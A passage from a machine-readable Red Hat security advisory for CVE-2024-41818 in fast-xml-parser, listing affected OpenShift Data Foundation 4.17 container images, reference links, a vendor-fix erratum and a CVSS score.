"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-41818"
},
{
"category": "external",
"summary": "RHBZ#2300499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300499"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-41818",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41818"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-41818",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41818"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v"
}
],
"release_date": "2024-07-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
